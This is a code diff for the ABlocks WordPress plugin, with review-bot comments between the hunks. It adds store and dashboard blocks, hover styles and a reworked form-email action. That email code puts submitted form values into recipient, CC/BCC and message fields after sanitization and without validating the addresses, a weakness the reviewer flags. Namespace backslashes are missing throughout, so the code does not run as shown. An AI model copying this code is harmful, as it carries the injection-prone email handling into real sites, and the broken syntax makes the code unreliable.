@@ -72,8 +73,13 @@
 			new ABlocksBlocksStoreengineOrderInfoBlock();
 			new ABlocksBlocksStoreengineBillingInfoBlock();
 			new ABlocksBlocksStoreengineShippingInfoBlock();
+			new ABlocksBlocksStoreengineCartNoticeBlock();
 			new ABlocksBlocksStoreengineOrderDetailsBlock();
 			new ABlocksBlocksStoreengineMiniCartBlock();
+			new ABlocksBlocksStoreengineProductGalleryBlock();
+			new ABlocksBlocksStoreengineProductSummaryBlock();
+			new ABlocksBlocksStoreengineProductDescriptionBlock();
+			new ABlocksBlocksStoreengineProductReviewBlock();
 		}//end if
 		new ABlocksBlocksContainerBlock();
 		new ABlocksBlocksHeadingBlock();
@@ -139,6 +145,7 @@
 		new ABlocksBlocksSocialSharesBlock();
 		new ABlocksBlocksNoticeBlock();
 		new ABlocksBlocksSvgDrawBlock();
+		new ABlocksBlocksFrontendDashboardBlock();
 		new ABlocksBlocksLottieAnimationBlock();
 		new ABlocksBlocksMarqueeBlock();
 		new ABlocksBlocksMarqueeChildBlock();
--- a/ablocks/includes/blocks/academy-container/attributes.php
+++ b/ablocks/includes/blocks/academy-container/attributes.php
@@ -0,0 +1,42 @@
+<?php
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksControlsAlignment;
+use ABlocksControlsRange;
+
+$attributes = [
+	'block_id' => [
+		'type'    => 'string',
+		'default' => '',
+	],
+	'blockVersion' => [
+		'type'    => 'number',
+		'default' => 2,
+	],
+	'floatMargin'  => [
+		'type'    => 'object',
+		'default' => '',
+	],
+	'variationSelected'  => [
+		'type'    => 'boolean',
+		'default' => false,
+	],
+];
+
+$attributes = array_merge(
+	$attributes,
+	Alignment::get_attribute( 'floatAlignment', true ),
+	Range::get_attribute([
+		'attributeName' => 'containerWidth',
+		'attributeObjectKey' => 'value',
+		'isResponsive' => true,
+		'hasUnit' => true,
+		'unitDefaultValue' => 'px',
+		'defaultValue' => 290,
+	]),
+);
+
+return array_merge( $attributes, ABlocksClassesBlockGlobal::get_attributes() );
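Review bot: `floatMargin` is declared with `'type' => 'object'` but `'default' => ''`, which is a string. Use an empty array, or the structure `Dimensions::get_css()` expects, as the default so that the declared type and the default agree.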
--- a/ablocks/includes/blocks/academy-container/block.php
+++ b/ablocks/includes/blocks/academy-container/block.php
@@ -0,0 +1,59 @@
+<?php
+namespace ABlocksBlocksAcademyContainer;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksClassesBlockBaseAbstract;
+use ABlocksClassesCssGeneratorV2;
+use ABlocksControlsAlignment;
+use ABlocksControlsRange;
+use ABlocksControlsDimensions;
+use ABlocksHelper;
+
+
+class Block extends BlockBaseAbstract {
+	protected $parent_block_name = 'academy-certificate';
+	protected $block_name = 'academy-container';
+
+	public function build_css( $attributes ) {
+		$css_generator = new CssGeneratorV2( $attributes, $this->block_name );
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .academy-inner-container > div ',
+			$this->get_wrapper_css( $attributes ),
+			$this->get_wrapper_css( $attributes, 'Tablet' ),
+			$this->get_wrapper_css( $attributes, 'Mobile' )
+		);
+		return $css_generator->generate_css();
+	}
+
+	public function get_wrapper_css( $attributes, $device = '' ) {
+		$css = [];
+
+		$float_css = Alignment::get_css(
+			$attributes['floatAlignment'] ?? [],
+			'float',
+			$device
+		);
+
+		if ( isset( $float_css['float'] ) && 'default' === $float_css['float'] ) {
+			unset( $float_css['float'] );
+		}
+
+		return array_merge(
+			$css, $float_css,
+			Range::get_css([
+				'attributeValue' => $attributes['containerWidth'],
+				'attribute_object_key' => 'value',
+				'isResponsive' => true,
+				'defaultValue' => 200,
+				'hasUnit' => true,
+				'unitDefaultValue' => 'px',
+				'property' => 'width',
+				'device' => $device,
+			]),
+			Dimensions::get_css( $attributes['floatMargin'] ?? [], 'margin', $device ),
+		);
+	}
+}
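Review bot: In `get_wrapper_css()`, `$attributes['containerWidth']` is read without a fallback, while `floatAlignment` and `floatMargin` on the neighbouring lines use `?? []`; a block saved without that attribute triggers an undefined-index notice or warning. Add the same `?? []` fallback. The `defaultValue` passed to `Range::get_css()` here is 200, whereas `attributes.php` registers `containerWidth` with `defaultValue` 290; confirm which is intended and use it in both places.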
--- a/ablocks/includes/blocks/academy-course-media/block.php
+++ b/ablocks/includes/blocks/academy-course-media/block.php
@@ -81,7 +81,7 @@

 	}

-	public function get_featured_image_container_css($attributes, $device = '') {
+	public function get_featured_image_container_css( $attributes, $device = '' ) {
 		$alignment_value = $attributes['alignment'][ 'value' . $device ] ?? '';
 		$css = [];
 		if ( ! empty( $alignment_value ) ) {
@@ -92,7 +92,7 @@
 		return $css;
 	}

-	public function get_featured_image_hover_css($attributes, $device = '') {
+	public function get_featured_image_hover_css( $attributes, $device = '' ) {
 		$css = [];
 		$css['opacity']  = $attributes['imageOpacityH'] ?? '';
 		return array_merge(
@@ -100,7 +100,7 @@
 			BoxShadow::get_hover_css( $attributes['boxShadow'], '', $device ),
 		);
 	}
-
+

 	public function render_block_content( $attributes, $content, $block_instance ) {
 		$attr_array = [];
--- a/ablocks/includes/blocks/advance-list-item/block.php
+++ b/ablocks/includes/blocks/advance-list-item/block.php
@@ -50,6 +50,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}} .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
 			Icon::get_element_image_css( $attributes, 'Tablet' ),
--- a/ablocks/includes/blocks/blocks.php
+++ b/ablocks/includes/blocks/blocks.php
@@ -95,8 +95,10 @@
 	'form-password',
 	'form-select',
 	'form-radio',
+	'frontend-dashboard',
 	'text-path',
 	// Academy LMS
+	'academy-container',
 	'academy-certificate',
 	'academy-certificate-id',
 	'academy-certificate-text',
@@ -125,5 +127,9 @@
 	'storeengine-shipping-info',
 	'storeengine-order-details',
 	'storeengine-mini-cart',
-
+	'storeengine-cart-notice',
+	'storeengine-product-gallery',
+	'storeengine-product-summary',
+	'storeengine-product-description',
+	'storeengine-product-review',
 ];
--- a/ablocks/includes/blocks/breadcrumb/block.php
+++ b/ablocks/includes/blocks/breadcrumb/block.php
@@ -89,13 +89,13 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbTitlecolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbTitlecolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbTitlecolor'] );
 		}

 		$dir     = isset( $attributes['taxonomyTitleDirection'] ) ? $attributes['taxonomyTitleDirection'] : null;
 		$dirCss  = ! is_null( $dir ) ? get_alignment_css( $dir, 'justify-content', $device ) : [];
 		if ( ! empty( $attributes['breadcrumbItemBackground'] ) ) {
-			$css['background-color'] = $attributes['breadcrumbItemBackground'];
+			$css['background-color'] = Color::get_css( $attributes['breadcrumbItemBackground'] );
 		}
 		$typographyValueGlobal = ! empty( $attributes['breadcrumbTitleTypographyGlobal'] ) ? $attributes['breadcrumbTitleTypographyGlobal'] : '';
 		return array_merge(
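Review bot: No hunk for breadcrumb/block.php adds a `use` import for the Color control, yet `Color::get_css()` is now called for `$css['color']` and `$css['background-color']` here and in the four hunks that follow. Confirm the import already exists at the top of the file. If it does not, the first render with `breadcrumbTitlecolor` set fails with a class-not-found error.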
@@ -110,7 +110,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbLinkcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbLinkcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbLinkcolor'] );
 		}

 		return $css;
@@ -120,7 +120,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbHoverLinkcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbHoverLinkcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbHoverLinkcolor'] );
 		}

 		return $css;
@@ -130,7 +130,7 @@
 		$css = [];

 		if ( ! empty( $attributes['breadcrumbseparatorcolor'] ) ) {
-			$css['color'] = $attributes['breadcrumbseparatorcolor'];
+			$css['color'] = Color::get_css( $attributes['breadcrumbseparatorcolor'] );
 		}

 		if ( ! empty( $attributes['breadcrumbseparsize'] ) ) {
@@ -144,7 +144,7 @@
 		$css = [];

 		if ( ! empty( $attributes['beforeBreadcrumbBackgroundcolor'] ) ) {
-			$css['background-color'] = $attributes['beforeBreadcrumbBackgroundcolor'];
+			$css['background-color'] = Color::get_css( $attributes['beforeBreadcrumbBackgroundcolor'] );
 		}

 		return array_merge(
--- a/ablocks/includes/blocks/button/block.php
+++ b/ablocks/includes/blocks/button/block.php
@@ -69,6 +69,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
@@ -145,6 +151,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
--- a/ablocks/includes/blocks/carousel/attributes.php
+++ b/ablocks/includes/blocks/carousel/attributes.php
@@ -5,6 +5,7 @@
 use ABlocksControlsBorder;
 use ABlocksComponentsButtonGroup;
 use ABlocksControlsDimensions;
+use ABlocksControlsBoxShadow;
 $attributes = [
 	'block_id'          => [
 		'type'          => 'string',
@@ -129,6 +130,7 @@
 	Border::get_attribute( 'paginationBorder', true ),
 	Border::get_attribute( 'activePaginationBorder', true ),
 	Dimensions::get_attribute( 'navigationIconPadding', true ),
+	BoxShadow::get_attribute( 'navigationIconBoxShadow', true ),
 	Range::get_attribute([
 		'attributeName' => 'carouselHeight',
 		'attributeObjectKey' => 'value',
--- a/ablocks/includes/blocks/carousel/block.php
+++ b/ablocks/includes/blocks/carousel/block.php
@@ -9,6 +9,7 @@
 use ABlocksControlsDimensions;
 use ABlocksControlsBorder;
 use ABlocksControlsColor;
+use ABlocksControlsBoxShadow;



@@ -313,6 +314,7 @@
 			$navigation_icon_svg_css,
 			Dimensions::get_css( $attributes['navigationIconPadding'], 'padding', $device ),
 			Border::get_css( $attributes['navigationIconBorder'], '', $device ),
+			BoxShadow::get_css( $attributes['navigationIconBoxShadow'], $device ),
 		);
 	}
 	public function get_navigation_icon_svg_hover_css( $attributes, $device = '' ) {
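Review bot: The two new BoxShadow calls in this file take their arguments in different positions: `BoxShadow::get_css( $attributes['navigationIconBoxShadow'], $device )` passes `$device` second, while the next hunk's `BoxShadow::get_hover_css( $attributes['navigationIconBoxShadow'], '', $device )` passes it third, after an empty string. Check the `get_css()` signature so `$device` does not land in a different parameter, and read the attribute with `?? []` as other new code in this patch does, so a missing `navigationIconBoxShadow` key does not raise a warning.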
@@ -334,6 +336,7 @@
 			]),
 			$navigation_icon_svg_hover_css,
 			Border::get_hover_css( $attributes['navigationIconBorder'], '', $device ),
+			BoxShadow::get_hover_css( $attributes['navigationIconBoxShadow'], '', $device ),
 		);
 	}

--- a/ablocks/includes/blocks/counter/block.php
+++ b/ablocks/includes/blocks/counter/block.php
@@ -73,6 +73,13 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+				$css_generator->add_class_styles(
+					'{{WRAPPER}} .ablocks-icon-wrap:hover',
+					Icon::get_wrapper_hover_css( $attributes ),
+					Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+					Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+				);
+
 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
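Review bot: The added `add_class_styles()` call for `.ablocks-icon-wrap:hover` is indented two tabs deeper than the calls around it, while the second hunk in this file adds the same block at the normal depth. Re-indent it to match the rest of the method.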
@@ -177,6 +184,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
 			Icon::get_element_image_css( $attributes ),
 			Icon::get_element_image_css( $attributes, 'Tablet' ),
--- a/ablocks/includes/blocks/coupon/block.php
+++ b/ablocks/includes/blocks/coupon/block.php
@@ -37,6 +37,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
@@ -94,6 +100,12 @@
 			Icon::get_wrapper_css( $attributes, 'Tablet' ),
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);

 		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-icon-wrap img.ablocks-image-icon',
--- a/ablocks/includes/blocks/divider/block.php
+++ b/ablocks/includes/blocks/divider/block.php
@@ -53,6 +53,13 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-divider__element-icon .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-divider__element-icon .ablocks-icon-wrap',
 			array_merge( Icon::get_wrapper_css( $attributes ), $this->get_icon_spacing_margins( $attributes, '' ) ),
 			array_merge( Icon::get_wrapper_css( $attributes, 'Tablet' ), $this->get_icon_spacing_margins( $attributes, 'Tablet' ) ),
@@ -124,6 +131,12 @@
 			Icon::get_wrapper_css( $attributes, 'Mobile' )
 		);
 		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-divider__element-icon .ablocks-icon-wrap:hover',
+			Icon::get_wrapper_hover_css( $attributes ),
+			Icon::get_wrapper_hover_css( $attributes, 'Tablet' ),
+			Icon::get_wrapper_hover_css( $attributes, 'Mobile' )
+		);
+		$css_generator->add_class_styles(
 			'{{WRAPPER}}  .ablocks-divider__element-icon .ablocks-icon-wrap',
 			array_merge( Icon::get_wrapper_css( $attributes ), $this->get_icon_spacing_margins( $attributes, '' ) ),
 			array_merge( Icon::get_wrapper_css( $attributes, 'Tablet' ), $this->get_icon_spacing_margins( $attributes, 'Tablet' ) ),
--- a/ablocks/includes/blocks/form-builder/actions/send-email.php
+++ b/ablocks/includes/blocks/form-builder/actions/send-email.php
@@ -110,6 +110,7 @@
 	 * @return void
 	 */
 	private function contact_form_send_email( string $num = 'One' ): void {
+		$this->user_email = $this->apply_vars( $this->user_email );
 		// check email notification is enabled or not
 		$nums = [
 			'One' => '',
@@ -124,26 +125,28 @@
 		}
 		$config = $this->validateformdata->form_info['info']['config'];

-		$to_email = sanitize_text_field( $config[ 'email' . $num . 'To' ] ?? $this->admin_email );
+		$to_email = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'To' ] ?? $this->admin_email ) );

-		$subject = sanitize_text_field( $config[ 'email' . $num . 'Subject' ] ?? '' );
+		$subject = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'Subject' ] ?? '' ) );
 		// translators: %s is email
 		$subject = $subject ? $subject : ( $this->user_email ? sprintf( __( 'You have a message from %s', 'ablocks' ), $this->user_email ) : __( 'You have a message', 'ablocks' ) );

 		$type    = strtolower( sanitize_text_field( $config[ 'email' . $num . 'Type' ] ?? 'html' ) );
-		$message = sanitize_text_field( $config[ 'email' . $num . 'Message' ] ?? '' );
+		$message = $this->apply_vars( sanitize_text_field( $config[ 'email' . $num . 'Message' ] ?? '' ) );
 		// check {all-fields} exists or not
+		$message = empty( $message ) ? '{all-fields}' : $message;
 		if ( preg_match( '|{all-fields}|im', $message ) ) {
 			// if exist then replace this text to data table
 			$message = str_replace( '{all-fields}', $this->get_data_as_table_format( $type ), $message );
-		} elseif ( $message ) {
-			// if message is defined by user and {all-fields} is not available
-			// then insert datatable at the end of msg
-			$message .= $this->get_data_as_table_format( $type );
-		} else {
-			// if msg is not defined by user, the add only datatable
-			$message = $this->get_data_as_table_format( $type );
 		}
+		// elseif ( $message ) {
+		// if message is defined by user and {all-fields} is not available
+		// then insert datatable at the end of msg
+		// $message .= $this->get_data_as_table_format( $type );
+		// } else {
+		// if msg is not defined by user, the add only datatable
+		// $message = $this->get_data_as_table_format( $type );
+		// }
 		$headers = [];

 		$from_email = sanitize_text_field( $config[ 'email' . $num . 'FormEmail' ] ?? '' );
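Review bot: `apply_vars()` wraps the result of `sanitize_text_field()` for `$to_email`, `$subject` and `$message`, so the values it substitutes (which a later hunk shows include the submitted `form_info['data']` fields) reach the recipient, subject and body after sanitization has already run. Substitute first and sanitize the result, and validate the To value with `is_email()`, so a placeholder cannot introduce markup into an HTML mail or an unintended recipient. Separately, commenting out the `elseif`/`else` branches changes behaviour: a custom message without `{all-fields}` no longer gets the data table appended. Delete the dead code and state in the commit message whether that change is intended.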
@@ -160,14 +163,24 @@
 		if ( $reply_to ) {
 			$headers[] = 'Reply-To: ' . $reply_to;
 		}
-
 		if ( $cc ) {
-			$headers[] = 'CC: ' . $cc;
+			$headers[] = 'CC: ' . implode( ',', array_unique(
+				preg_split(
+					'|[,s]|', $this->apply_vars( strval( $cc ) )
+				)
+			) );
 		}
 		if ( $bcc ) {
-			$headers[] = 'BCC: ' . $bcc;
+			$headers[] = 'BCC: ' . implode( ',', array_unique(
+				preg_split(
+					'|[,s]|', $this->apply_vars( strval( $bcc ) )
+				)
+			) );
 		}

+		if ( $type === 'plain' ) {
+			$headers[] = 'Content-Type: text/plain; charset=UTF-8';
+		}
 		$template = $type === 'plain' ? 'email/plain-text/contact-email.php' : 'email/contact-email.php';

 		ob_start();
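Review bot: The CC and BCC headers are built straight from `preg_split()` output, without trimming, dropping empty pieces or validating each address, unlike the To loop later in this patch, which at least trims and skips empties. Filter the pieces through `is_email()` before `implode()`, and skip the header when nothing valid remains, because the values pass through `apply_vars()` and can therefore carry submitted field content. Also confirm the split pattern: as displayed, `'|[,s]|'` splits on a comma and the letter s, not on whitespace.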
@@ -177,8 +190,32 @@
 			]);

 		$data = ob_get_clean();
+		foreach ( array_unique( preg_split( '|[,s]|', strval( $to_email ) ) ) as $email ) {
+			$email = trim( $email );
+			if ( ! empty( $email ) ) {
+				$this->send_email( $subject, $data, $email, $headers );
+			}
+		}

-		$this->send_email( $subject, $data, $to_email, $headers );
+	}
+
+	private function apply_vars( ?string $msg ): ?string {
+		$admin_email = get_option( 'admin_email' );
+		$current_user = wp_get_current_user();
+		$current_user_email = $current_user->user_email;
+
+		$fields = array_merge(
+			$this->validateformdata->form_info['data'] ?? [],
+			[
+				'admin_email'  => [ 'value' => $admin_email ],
+				'user_email'   => [ 'value' => $current_user_email ]
+			]
+		);
+		// wp_send_json($fields);
+		foreach ( $fields as $key => [ 'value' => $val ] ) {
+			$msg = str_replace( "{{$key}}", $val, $msg );
+		}
+		return $msg;
 	}

 	/**
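Review bot: In `apply_vars()`, the destructuring `foreach ( $fields as $key => [ 'value' => $val ] )` assumes every entry of `form_info['data']` is an array with a scalar `value`. An entry without that key, or with an array value, raises warnings or a TypeError in `str_replace()`, depending on the PHP version. Check `is_array()` and `is_scalar()` before replacing, and return early when `$msg` is null, since the signature accepts `?string`. In the To loop above, each piece is only trimmed and tested for empty, so add `is_email( $email )` before `send_email()`. The leftover `// wp_send_json($fields);` debug line should be removed.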
--- a/ablocks/includes/blocks/form-builder/attributes.php
+++ b/ablocks/includes/blocks/form-builder/attributes.php
@@ -113,7 +113,7 @@
 	// email One settings
 	'emailOneTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneSubject' => [
 		'type' => 'string',
@@ -125,7 +125,7 @@
 	],
 	'emailOneFormEmail' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneFormName' => [
 		'type' => 'string',
@@ -133,7 +133,7 @@
 	],
 	'emailOneReplyTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailOneCc' => [
 		'type' => 'string',
@@ -150,7 +150,7 @@
 	// email two settings
 	'emailTwoTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoSubject' => [
 		'type' => 'string',
@@ -162,7 +162,7 @@
 	],
 	'emailTwoFormEmail' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoFormName' => [
 		'type' => 'string',
@@ -170,7 +170,7 @@
 	],
 	'emailTwoReplyTo' => [
 		'type' => 'string',
-		'default' => 'someone@example.com'
+		'default' => ''
 	],
 	'emailTwoCc' => [
 		'type' => 'string',
@@ -508,9 +508,28 @@
 	'roleSlug' => [
 		'type' => 'string',
 		'default' => '',
-	]
-];
+	],
+	'confirmationNotice' => [
+		'type' => 'string',
+		'default' => 'Form successfully submitted!'

+	],
+	'afterFormSubmission' => [
+		'type' => 'string',
+		'default' => 'reset'
+
+	],
+	'customUrl' => [
+		'type' => 'string',
+		'default' => ''
+
+	],
+	'confirmationType' => [
+		'type' => 'string',
+		'default' => 'success'
+
+	],
+];
 $attributes = array_merge(
 	$attributes,
 	Alignment::get_attribute( 'labelAlignment', true, [ 'value' => 'left' ] ),
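Review bot: The new `confirmationNotice` default, 'Form successfully submitted!', is a hard-coded English string, while user-facing strings elsewhere in this patch go through `__( ..., 'ablocks' )`. Make it translatable where it is rendered or leave the default empty. `customUrl` is declared as an unconstrained string, so if `afterFormSubmission` uses it as a redirect target, the consuming code should pass it through `esc_url_raw()` and `wp_validate_redirect()`. The blank lines before each closing `],` in the four new entries can be dropped.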
--- a/ablocks/includes/blocks/form-checkbox/attributes.php
+++ b/ablocks/includes/blocks/form-checkbox/attributes.php
@@ -12,7 +12,7 @@
 	),
 	'label' => [
 		'type' => 'string',
-		'default' => '',
+		'default' => 'Checkbox',
 	],

 	'errorMsg' => [
--- a/ablocks/includes/blocks/form-textarea/attributes.php
+++ b/ablocks/includes/blocks/form-textarea/attributes.php
@@ -23,7 +23,7 @@
 		'type' => 'string',
 		'default' => '',
 	],
-	'inputType' => [
+	'nameType' => [
 		'type' => 'string',
 		'default' => '',
 	],
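Review bot: Renaming the attribute key from `inputType` to `nameType` leaves nothing registered under the old name, so a form-textarea block saved with `inputType` loses that value on the next render or save. If the rename is intentional, add a block deprecation or a fallback read of the old key, and note the reason in the commit message.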
--- a/ablocks/includes/blocks/frontend-dashboard/attributes.php
+++ b/ablocks/includes/blocks/frontend-dashboard/attributes.php
@@ -0,0 +1,91 @@
+<?php
+
+use ABlocksControlsTypography;
+use ABlocksControlsTextShadow;
+use ABlocksControlsTextStroke;
+use ABlocksControlsBackground;
+use ABlocksControlsBorder;
+use ABlocksControlsDimensions;
+use ABlocksControlsIcon;
+use ABlocksControlsRange;
+
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+$attributes = [
+	'block_id' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'dashboard_page' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'sidebarBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'sidebarUserBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'contentBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'userTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'breadcrumbColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListActiveBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListActiveTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListHoverBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListHoverTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListBackground' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+	'menuListTextColor' => array(
+		'type' => 'string',
+		'default' => '',
+	),
+];
+
+
+return array_merge(
+	$attributes,
+	Range::get_attribute([
+		'attributeName' => 'bothGap',
+		'isResponsive' => false,
+		'defaultValue' => 30,
+	]),
+	Border::get_attribute( 'sidebarBorder', true ),
+	Border::get_attribute( 'userSidebarBorder', true ),
+	Border::get_attribute( 'menuListBorder', true ),
+	Border::get_attribute( 'contentBorder', true ),
+	Typography::get_attribute( 'userTypography', true ),
+	Typography::get_attribute( 'breadcrumbtTypography', true ),
+	Typography::get_attribute( 'menuListTypography', true ),
+	Dimensions::get_attribute( 'menuListPadding', true ),
+	Dimensions::get_attribute( 'contentPadding', true ),
+	ABlocksClassesBlockGlobal::get_attributes()
+);
+
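Review bot: Four of the imports at the top of this new file (TextShadow, TextStroke, Background and Icon) are never referenced in it. Only Range, Border, Typography and Dimensions are used in the `array_merge()` call, so drop the rest. The attribute name `breadcrumbtTypography` looks like a typo for `breadcrumbTypography`. Fix it now, before saved blocks depend on the misspelled key, and keep block.php in sync.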
--- a/ablocks/includes/blocks/frontend-dashboard/block.php
+++ b/ablocks/includes/blocks/frontend-dashboard/block.php
@@ -0,0 +1,451 @@
+<?php
+namespace ABlocksBlocksFrontendDashboard;
+
+if ( ! defined( 'ABSPATH' ) ) {
+	exit;
+}
+
+use ABlocksClassesBlockBaseAbstract;
+use ABlocksClassesCssGenerator;
+use ABlocksHelper;
+use ABlocksControlsTypography;
+use ABlocksControlsTextShadow;
+use ABlocksControlsTextStroke;
+use ABlocksControlsBackground;
+use ABlocksControlsBorder;
+use ABlocksControlsDimensions;
+use ABlocksControlsRange;
+use ABlocksControlsColor;
+
+
+class Block extends BlockBaseAbstract {
+	protected $block_name = 'frontend-dashboard';
+
+	public function __construct() {
+		parent::__construct();
+
+	}
+
+	public function build_css( $attributes ) {
+
+		$css_generator = new CssGenerator( $attributes, $this->block_name );
+
+		$get_gaps_css = $this->get_wrapper_gap_css( $attributes );
+		$css_generator->add_class_styles(
+			'{{WRAPPER}}.ablocks-block--frontend-dashboard',
+			$get_gaps_css,
+			$this->get_wrapper_gap_css( $attributes, 'Tablet' ),
+			$this->get_wrapper_gap_css( $attributes, 'Mobile' )
+		);
+
+		$get_setting_css = $this->get_setting_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-sidebar',
+			$get_setting_css,
+			$this->get_setting_css( $attributes, 'Tablet' ),
+			$this->get_setting_css( $attributes, 'Mobile' )
+		);
+
+		$get_user_setting_css = $this->get_user_setting_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-user',
+			$get_user_setting_css,
+			$this->get_user_setting_css( $attributes, 'Tablet' ),
+			$this->get_user_setting_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_list_css = $this->get_menu_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item a',
+			$get_menu_list_css,
+			$this->get_menu_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_hover_list_css = $this->get_menu_hover_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item a:hover',
+			$get_menu_hover_list_css,
+			$this->get_menu_hover_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_hover_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_menu_active_list_css = $this->get_menu_active_list_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-menu__item--current a',
+			$get_menu_active_list_css,
+			$this->get_menu_active_list_css( $attributes, 'Tablet' ),
+			$this->get_menu_active_list_css( $attributes, 'Mobile' )
+		);
+
+		$get_breadcrumb_css = $this->get_breadcrumb_css( $attributes );
+
+		$css_generator->add_class_styles(
+			'{{WRAPPER}} .ablocks-frontend-dashboard-breadcrumb li',
+			$get_breadcrumb_css,
